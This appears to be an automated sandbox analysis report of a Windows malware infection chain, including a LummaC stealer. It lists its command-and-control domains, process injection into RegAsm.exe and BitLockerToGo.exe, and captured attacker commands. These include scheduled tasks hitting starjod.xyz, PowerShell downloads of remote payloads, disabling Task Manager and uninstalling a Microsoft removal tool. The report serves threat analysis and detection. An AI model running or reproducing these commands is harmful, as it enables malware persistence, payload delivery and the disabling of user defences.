Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2D10000 value starts with: 4D5A

LummaC encrypted strings found

Source: lummac2.exe, 00000008.00000000.2127450057.00000000005ED000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: barebrilliancedkoso.shop
Source: lummac2.exe, 00000008.00000000.2127450057.00000000005ED000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: parallelmercywksoffw.shop
Source: lummac2.exe, 00000008.00000000.2127450057.00000000005ED000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: ohfantasyproclaiwlo.shop
Source: lummac2.exe, 00000008.00000000.2127450057.00000000005ED000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: landdumpycolorwskfw.shop
Source: lummac2.exe, 00000008.00000000.2127450057.00000000005ED000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: flourhishdiscovrw.shop
Source: lummac2.exe, 00000008.00000000.2127450057.00000000005ED000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: conferencefreckewl.shop
Source: lummac2.exe, 00000008.00000000.2127450057.00000000005ED000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: notoriousdcellkw.shop
Source: lummac2.exe, 00000008.00000000.2127450057.00000000005ED000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: liabiliytshareodlkv.shop
Source: taskweaker.exe, 00000024.00000003.2442815997.00000231C7760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: facilitycoursedw.shop
Source: taskweaker.exe, 00000024.00000003.2442815997.00000231C7760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: doughtdrillyksow.shop
Source: taskweaker.exe, 00000024.00000003.2442815997.00000231C7760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: disappointcredisotw.shop
Source: taskweaker.exe, 00000024.00000003.2442815997.00000231C7760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: bargainnygroandjwk.shop
Source: taskweaker.exe, 00000024.00000003.2442815997.00000231C7760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: injurypiggyoewirog.shop
Source: taskweaker.exe, 00000024.00000003.2442815997.00000231C7760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: leafcalfconflcitw.shop
Source: taskweaker.exe, 00000024.00000003.2442815997.00000231C7760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: computerexcudesp.shop
Source: taskweaker.exe, 00000024.00000003.2442815997.00000231C7760000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: publicitycharetew.shop

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 910008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46E000
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1174008
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2D10000
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2EFC008

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe "C:\Users\user\AppData\Local\Temp\1000007001\ama.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe "C:\Users\user\AppData\Local\Temp\1000035001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe "C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe "C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe "C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe "C:\Users\user\AppData\Local\Temp\1000092001\legs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe "C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe "C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3136 -ip 3136
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 264
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\install.bat"
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: axplong.exe, axplong.exe, 00000003.00000002.2095723344.0000000000EE9000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000017.00000002.2259714119.0000000003318000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: RegAsm.exe, 00000017.00000002.2259714119.0000000003318000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Code function: 2_2_00D0D2E8 cpuid

2_2_00D0D2E8

Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	5_2_00A00164
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: EnumSystemLocalesW,	5_2_00A004EC
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: EnumSystemLocalesW,	5_2_00A00406
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: EnumSystemLocalesW,	5_2_00A00451
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_00A00577
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: EnumSystemLocalesW,	5_2_009F7545
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,	5_2_00A007CA
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_00A008F3
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,	5_2_00A009F9
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00A00AC8
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: GetLocaleInfoW,	5_2_009F7A6B

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000014001\1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000014001\1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
